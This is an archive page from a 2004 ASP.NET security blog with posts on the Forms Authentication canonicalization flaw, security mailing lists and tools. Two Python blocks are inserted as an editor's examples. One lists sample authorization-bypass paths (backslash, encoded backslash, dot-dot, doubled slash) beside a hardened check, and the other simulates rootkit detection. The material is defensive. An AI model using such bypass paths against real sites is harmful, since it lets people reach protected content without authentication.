MS has updated What You Should Know About a Reported Vulnerability in Microsoft ASP.NET with information on the Microsoft ASP.NET ValidatePath Module. This module does machine-wide what the recommended global.asax fix does per application. The advantages? Only one install per machine, no developer who could forget to implement the fix, and it also works for applications of which you only have the compiled site. Running on this very Web server.

Categories: Administration | ASP.NET | Security
Friday, 08 October 2004 07:38:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 06 October 2004

Early Tuesday morning last week, I already had a blog entry up with exactly that title. However, I took it down because Scott Guthrie asked me to buy some time for his ASP.NET team, which was already working on a fix for the zero-day exploit reported on NTBugtraq. I changed my entry to Two of the most important security mailing lists, an article containing useful advice, especially since programmers are usually not subscribed to these lists, which I consider to be bordering on irresponsible these days.

To get back to the security bug in Forms Authentication: the ASP.NET team has posted a KB article and a security alert. Implement one of the workaround options immediately!

An IIS best practice, using URLScan to block the backslash canonicalization issue found in ASP.NET, was brought up independently by Stephan on our German ASP.NET mailing list last Tuesday. Too bad that we had to advise lots of people to install a tool that has been readily available for years!

Bootnote: Had it not been a security vulnerability in ASP.NET, I would never even have considered taking my blog entry down (the ASP.NET team is just absolutely fabulous and their support for the community rocks). I flat-out do not believe that one helps the good guys by not telling them about publicly known zero-day exploits (NTBugtraq isn't just any mailing list after all, and shooting the messenger never was a brilliant solution). This is why the German ASP.NET community knew about the exploit before 7:30 AM CET on Tuesday. Even if we hadn't found a workaround, disabling vulnerable sites would still have been a much better choice than being hacked without knowing it.
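To make the bypass and the workaround concrete, here is an added example in Python (this editor's own code, not the global.asax snippet from the KB article, not the ValidatePath module, and not code from this blog). It models the shape of the problem: URL authorization compares the virtual path as it was received, while the file system treats a backslash like a slash and collapses dot segments, so a path that does not literally start with /secure/ can still land in the protected folder. The protected prefix, the sample URLs and every function name are assumptions of the example; the hardened check rejects any request whose path is not already in canonical form, which is what the global.asax workaround and the module do at the pipeline level.

```python
from urllib.parse import unquote

# Assumption of this example: everything under /secure/ is guarded by an ASP.NET
# URL-authorization rule (<location path="secure"> with <deny users="?"/>).
PROTECTED_PREFIX = "/secure/"


def canonical(vpath: str) -> str:
    """The path the Win32 file system actually opens for a virtual path:
    '\\' and '/' are interchangeable, '.' and '..' segments collapse,
    repeated slashes merge, and trailing dots/spaces on a name are dropped."""
    out = []
    for seg in vpath.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        name = seg.rstrip(". ")
        if name:
            out.append(name)
    path = "/" + "/".join(out)
    if out and vpath.replace("\\", "/").endswith("/"):
        path += "/"
    return path


def vulnerable_decision(request_path: str) -> str:
    """Pre-fix shape: authorization matches the virtual path as received.
    '/secure\\admin.aspx' does not start with '/secure/', so it counts as
    public, yet the file system serves /secure/admin.aspx for it."""
    return "auth required" if request_path.startswith(PROTECTED_PREFIX) else "public"


def hardened_decision(request_path: str) -> str:
    """With the workaround: a request whose virtual path is not already in
    canonical form (backslash, '..', '.', doubled slash, trailing dot) is
    rejected before authorization runs; the global.asax fix answers with 404."""
    if "\\" in request_path or canonical(request_path) != request_path:
        return "reject (404)"
    return vulnerable_decision(request_path)


def evaluate(url_path: str) -> dict:
    """Run one URL path through both checks. ASP.NET hands the pipeline the
    percent-decoded virtual path (Request.Path), so decode exactly once here."""
    request_path = unquote(url_path)
    return {
        "url": url_path,
        "serves": canonical(request_path),
        "vulnerable": vulnerable_decision(request_path),
        "hardened": hardened_decision(request_path),
    }


def bypasses(url_path: str) -> bool:
    """True when the request lands in the protected folder, the pre-fix check
    would have let it through unauthenticated, and the hardened check stops it."""
    r = evaluate(url_path)
    return (r["serves"].startswith(PROTECTED_PREFIX)
            and r["vulnerable"] == "public"
            and r["hardened"].startswith("reject"))


# Constructed sample requests: two legitimate ones, then four bypass attempts.
SAMPLE_REQUESTS = [
    "/public/index.aspx",
    "/secure/admin.aspx",
    "/secure\\admin.aspx",            # raw backslash (the reported issue)
    "/secure%5Cadmin.aspx",           # the same backslash, percent-encoded
    "/public/../secure/admin.aspx",   # dot-dot into the protected folder
    "//secure/admin.aspx",            # doubled leading slash
]

if __name__ == "__main__":
    for r in map(evaluate, SAMPLE_REQUESTS):
        print(f'{r["url"]:30} serves {r["serves"]:20} '
              f'pre-fix: {r["vulnerable"]:14} fixed: {r["hardened"]}')
```

The design point is that the hardened path does not try to enumerate bad characters; it compares the request against the one form the file system will resolve it to and refuses anything that differs. That is also why a machine-wide module is preferable to a per-application fix: the check has to run before any authorization decision, and one forgotten global.asax is one unprotected site.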

Categories: ASP.NET | Security
Wednesday, 06 October 2004 07:28:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 30 September 2004

OWASP (The Open Web Application Security Project) has a couple of projects online focused on ASP.NET security issues. Current projects include ANBS (ASP.NET Baseline Security), SAM'SHE (Security Analyzer for Microsoft's Shared Hosting Environments), ANSA (ASP.NET Security Analyzer) as well as the ASP.NET Security Guidelines for designing and deploying secure Web applications using ASP.NET (applicable to IIS 5 & 6).

OWASP .NET Projects Homepage

Categories: .NET | Administration | ASP.NET | Cool Download | Security
Thursday, 30 September 2004 07:48:15 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 29 September 2004

Newsforge has an article online which is excerpted from the book Know Your Enemy: Learning About Security Threats (2nd edition), a highly recommended read even for programmers, both the article (focused on honeypots) and of course the book. Written by members of the Honeynet Project, this book teaches you how to study a black hat attack and learn from it. In addition, you get valuable insight into the mindset of black hats and their community.

Categories: Books | Security
Wednesday, 29 September 2004 08:14:56 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 28 September 2004

I'm talking about NTBugtraq and SecurityFocus' BugTraq mailing list. The former is obviously centered on Windows bugs (including security ones); the latter covers all operating systems and applications, so there might be too much "chatter" on it for the average Windows administrator / programmer. However, being on those lists comes in handy when nasty security bugs or even zero-day exploits are announced.

Categories: Security
Tuesday, 28 September 2004 07:26:46 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 02 September 2004

The patch was already available up front; now the security advisory has been published on BugTraq (a list I very much recommend subscribing to).

Categories: Security
Thursday, 02 September 2004 07:35:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 01 September 2004

Cryptography Research put a Q&A online that answers questions around the hash collision attacks (against MD5 and related hash functions) that were announced at the CRYPTO 2004 conference (way back in '97 I attended too; wow, the rump sessions were really cool).

Categories: Security
Wednesday, 01 September 2004 20:32:34 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Authentication and Access Control Diagnostics 1.0 (more commonly known as AuthDiag) is a tool released by Microsoft aimed at helping IT professionals and developers find the source of authentication and authorization failures more effectively.

AuthDiag 1.0 offers an efficient method for troubleshooting authentication on IIS 5.x and 6.0. It analyzes the metabase configuration and system-wide policies, warns of possible points of failure and guides you to resolving the problem. AuthDiag 1.0 also includes a monitoring tool called AuthMon, designed to capture a snapshot of the problem while it occurs in real time. AuthMon is tailored to IIS servers and filters out any information not pertinent to the authentication or authorization process.

Download

Categories: Security | IIS
Wednesday, 01 September 2004 10:19:22 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 31 August 2004

NeoWin is running an interview with Bruce Schneier, author of books such as Applied Cryptography and of the monthly Crypto-Gram newsletter. His answers are interesting as always; I especially liked the ones to the questions "What do you see as the biggest threat in the IT age?" and "Who would you say should bear the burden of responsibility for security?"

Categories: Security
Tuesday, 31 August 2004 15:52:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 21 August 2004

The book The .NET Developer's Guide to Windows Security is available for online reading in Keith Brown's wiki. It answers seventy-five questions, quite a few of which a .NET programmer had better be able to answer! So be sure to check it out and bookmark the page for your future programming endeavors.

Categories: Security | .NET
Saturday, 21 August 2004 01:01:42 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 17 August 2004

The new version of MBSA (Microsoft Baseline Security Analyzer) can be found in the Download Center. Be sure to scan your systems for missing updates and common misconfigurations.

Categories: Security
Tuesday, 17 August 2004 00:55:55 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 14 August 2004
Categories: Security
Saturday, 14 August 2004 15:56:26 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 29 July 2004

The Web Application Security Consortium has released a paper (PDF link) on threat classification. Its intention is to clarify and organize the threats to the security of a Web site. The goals of this project:

  • Identify all known web application security classes of attack.
  • Agree on naming for each class of attack.
  • Develop a structured manner to organize the classes of attack.
  • Develop documentation that provides generic descriptions of each class of attack.

Definitely an interesting read if you are concerned about Web site security.

Categories: Newsbites | Security
Thursday, 29 July 2004 08:33:40 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 28 July 2004

The MSR article Why It’s A Bad Idea For Stealth Software To Hide Files had me stumble across a project of MSR, Strider. According to the description, it is "a black-box, state-based, and component-based approach to systems management and diagnostics. The statistical data analyses that we produce and the infrastructures and tools that we build help users manage their systems today and help developers design new operating systems with better manageability tomorrow."

I really like the idea of Strider Ghostbuster that is outlined in the article. To convince you to read it yourself, here is the overview diagram of what Ghostbuster does:

[Figure 1. The ScanDiff approach to exposing file-hiding software, from the aforementioned article; diagram not reproduced here]

Ghostbuster lets you find rootkits, keyloggers and other malware that hide their files from a plain directory listing. How is it done? Take a directory listing from inside the running (suspect) OS (step #1), boot from a WinPE CD and list the same volume again (step #2), and then compare the two scans (step #3). Anything the offline scan sees that the online scan did not report was being hidden by something hooked into the running system. You'll see immediately what was hidden, and it takes only around 15 minutes to do this - absolutely neat!
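As an added illustration (this editor's own Python, not Strider Ghostbuster itself and not code from the MSR article), here is the comparison step of ScanDiff run over two constructed listings: one taken from inside the running Windows installation, one taken from the same volume after booting WinPE. The listing format (path, size, modification time, tab separated), the file names, and the list of volatile paths to ignore are assumptions of the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    path: str    # path exactly as it appeared in the listing
    size: int    # bytes
    mtime: str   # modification time as text; only compared for equality


def parse_listing(text: str) -> dict:
    """Parse the constructed listing format: one 'path<TAB>size<TAB>mtime' line per
    file, '#' comment lines allowed. Keys are lower-cased because NTFS names are
    case-insensitive and the two scans may report different casing."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        path, size, mtime = line.split("\t")
        entries[path.lower()] = Entry(path, int(size), mtime)
    return entries


# Paths that legitimately change between the two scans (assumption: tune per box).
VOLATILE_PREFIXES = ("c:\\pagefile.sys", "c:\\windows\\system32\\config\\")


def scandiff(inside: dict, outside: dict) -> dict:
    """Step 3 of the procedure. 'hidden' is the interesting set: files the offline
    (WinPE) scan saw on disk that the listing taken inside the running OS did not
    report. 'phantom' is the reverse (rare; usually a file deleted in between), and
    'altered' flags files seen by both scans with a different size or timestamp."""
    hidden, phantom, altered = [], [], []
    for key in sorted(set(inside) | set(outside)):
        if key.startswith(VOLATILE_PREFIXES):
            continue
        i, o = inside.get(key), outside.get(key)
        if i is None:
            hidden.append(o.path)
        elif o is None:
            phantom.append(i.path)
        elif (i.size, i.mtime) != (o.size, o.mtime):
            altered.append(o.path)
    return {"hidden": hidden, "phantom": phantom, "altered": altered}


# Constructed sample data. Step 1: listing exported from the running (suspect) OS.
INSIDE_SCAN = (
    "# step 1: inside the running Windows installation\n"
    "C:\\WINDOWS\\system32\\kernel32.dll\t983552\t2004-08-04 12:00\n"
    "C:\\WINDOWS\\system32\\svchost.exe\t14336\t2004-08-04 12:00\n"
    "C:\\WINDOWS\\system32\\drivers\\tcpip.sys\t359040\t2004-08-04 12:00\n"
    "C:\\pagefile.sys\t402653184\t2004-10-05 08:02\n"
)

# Step 2: the same volume listed after booting WinPE from CD (no hooks active).
OUTSIDE_SCAN = (
    "# step 2: offline, from WinPE\n"
    "C:\\WINDOWS\\system32\\kernel32.dll\t983552\t2004-08-04 12:00\n"
    "C:\\WINDOWS\\system32\\svchost.exe\t29184\t2004-10-01 03:14\n"
    "C:\\WINDOWS\\system32\\drivers\\tcpip.sys\t359040\t2004-08-04 12:00\n"
    "C:\\WINDOWS\\system32\\drivers\\stealth.sys\t18432\t2004-10-01 03:14\n"
    "C:\\Program Files\\Common Files\\klog\\keys.txt\t5120\t2004-10-05 08:00\n"
    "C:\\pagefile.sys\t402653184\t2004-10-05 09:41\n"
)


def run_demo() -> dict:
    """Diff the two constructed scans; returns the hidden/phantom/altered lists."""
    return scandiff(parse_listing(INSIDE_SCAN), parse_listing(OUTSIDE_SCAN))


if __name__ == "__main__":
    for label, paths in run_demo().items():
        print(f"{label}: {len(paths)}")
        for p in paths:
            print("   ", p)
```

Two practical caveats: the inside listing must be taken from within the suspect OS, because that is where a rootkit's hooks are active, and the two scans should be taken as close together as possible, since anything that legitimately changes in between (page file, registry hives, logs) shows up as noise. A file visible to both scans but with a different size or timestamp is worth a second look as well, and nothing in this approach detects malware that makes no effort to hide.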

Closing words: be sure to check out the References section of the article!

Categories: MSR | Security
Wednesday, 28 July 2004 10:19:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 27 July 2004

The book Improving Web Application Security: Threats and Countermeasures (online: Guidelines Corrections) can also be browsed via solutions at a glance. I've been recommending this book for quite some time in the German community, so why not plug it again (and hence start the Security section of my blog).

Categories: Security
Tuesday, 27 July 2004 13:39:18 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



© Copyright 2017 Christoph Wille

newtelligence dasBlog 2.3.9074.18820